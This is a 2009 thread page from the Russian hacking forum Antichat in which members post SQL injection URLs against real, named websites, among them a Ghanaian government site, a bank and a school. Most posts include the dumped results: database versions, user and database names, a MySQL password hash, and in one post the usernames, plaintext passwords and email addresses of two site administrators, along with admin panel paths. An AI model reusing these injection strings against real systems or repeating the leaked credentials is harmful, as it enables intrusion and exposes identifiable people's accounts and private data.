ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9421  
Старый 19.05.2009, 14:25
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

Mysgl


http://nouvelivoire.com/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.67-community



http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.32-Debian_7etch3~bpo31+1-log
--------------------------------------------------------------------------------

10 WIB

5
 
Ответить с цитированием

  #9422  
Старый 19.05.2009, 15:17
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

IP network test & monitoring solutions

PR 3

http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

vesrion() - 5.0.45-log

PASS - 68faf6fe5f3d85c6 mysql hash
Login - выяснить не удалось
//какой-то частичный досутп к information_schema...

Последний раз редактировалось Krist_ALL; 19.05.2009 в 15:20..
 
Ответить с цитированием

  #9423  
Старый 19.05.2009, 15:51
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
Провел на форуме:
1562063

Репутация: 149
По умолчанию

PHP код:
http://www.digitalfunnies.com/item.php?item_no=-17+union+select+1,2,3,cast(concat_ws(0x3a,version(),database(),user())+as+binary),5,6,7,8,9,10-- 
4.1.16-standard-log:comicscans:comicscans@cyrax.dreamhost.com

==================

PHP код:
http://www.kupi-jeftinije.com/item.php?id=-266+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9-- 
4.1.22-standard-log:kupijeft_kupi:kupijeft_kupi@localhost
 
Ответить с цитированием

  #9424  
Старый 19.05.2009, 17:10
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

http://www.vats.gov.gh/newsdetails.php?ID=-20+union+select+1,username,password,4,5,6+from+use rs+limit+0,1+--


montero -business - kmantey@gmail.com
kwamedankyi -hello2day - kwame.dankyi@vats.gov.gh
оба амдины.
Админки не найдено....

PR 5
 
Ответить с цитированием

  #9425  
Старый 19.05.2009, 17:51
Rednoise
Новичок
Регистрация: 28.03.2007
Сообщений: 29
Провел на форуме:
62416

Репутация: 41
По умолчанию

http://www.seo-cms.ru/news_article.php?id=-2692+union+select+version(),2,user(),4,database(), 6/*

4.1.20-lk-log:skvitrru_seo:skvitrru_seo@localhost

при дальнейшем составлении запроса на выборку из таблиц перекидывает на другой сайт, типа фильтр стоит какой то хз, кому интересно поковыряйте
 
Ответить с цитированием

  #9426  
Старый 19.05.2009, 18:04
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

http://www.yp.md/news2/news.php?id=-261+union+select+1,2,3,4,version(),6,user(),8,9,10 ,11,12+--

PR 4

user() - ypmd_tester@localhost
version() - 5.0.67-community-log

есть таблица user_info ,но в ней ничего интересного нет....
 
Ответить с цитированием

  #9427  
Старый 19.05.2009, 18:46
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),version(),database()),11,12,13,14,15,16,17

valdis_valdis@localhost:5.0.77-community:valdis_valdis

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11, 12,13,14,15,16,17+from+information_schema.tables+l imit+x,1

в базах ничего интересного не нашел.
PR4, ТИЦ 50

http://www.bank45.ru/site.php?id=-10028+union+select+concat_ws(0x3a,version(),user() ,database())/*

http://www.bank45.ru/site.php?id=-10028+union+select+login+from+users/*

данные выводятся в title

Нашел ещё вот что:
http://www.bank45.ru/users/
особенно понравилось, когда переход по ok.php

так же почерпнуть информацию можно здесь:
http://www.bank45.ru/phpinfo.php

PR2 , ТИЦ 10

Последний раз редактировалось jokester; 19.05.2009 в 19:11.. Причина: Объединяй посты
 
Ответить с цитированием

  #9428  
Старый 19.05.2009, 19:25
savik143
Banned
Регистрация: 18.05.2009
Сообщений: 2
Провел на форуме:
73433

Репутация: -1
По умолчанию

http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

vesrion() - 5.0.45-log доступ нормальный логин admin,админка по адресу /admin

Последний раз редактировалось savik143; 19.05.2009 в 19:29..
 
Ответить с цитированием

  #9429  
Старый 19.05.2009, 20:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

http://www.massiveattack.com/blog.php?id=-657%20union%20select%201,2,3,4,5,6,CONCAT_WS(7,%20 user(),%20version(),%20database()),8,9.10,11,12,13 ,14,15,16,17,18,19,20,21%20/*
 
Ответить с цитированием

  #9430  
Старый 19.05.2009, 21:14
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 6]
Код:
http://perkins.pvt.k12.ma.us/museum/area.php?id=35+and+substring(@@version,1,1)=3
[PR 4]
Код:
http://www.unitech-adc.us/product_info.php?id=41+and+substring(@@version,1,1)=3
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ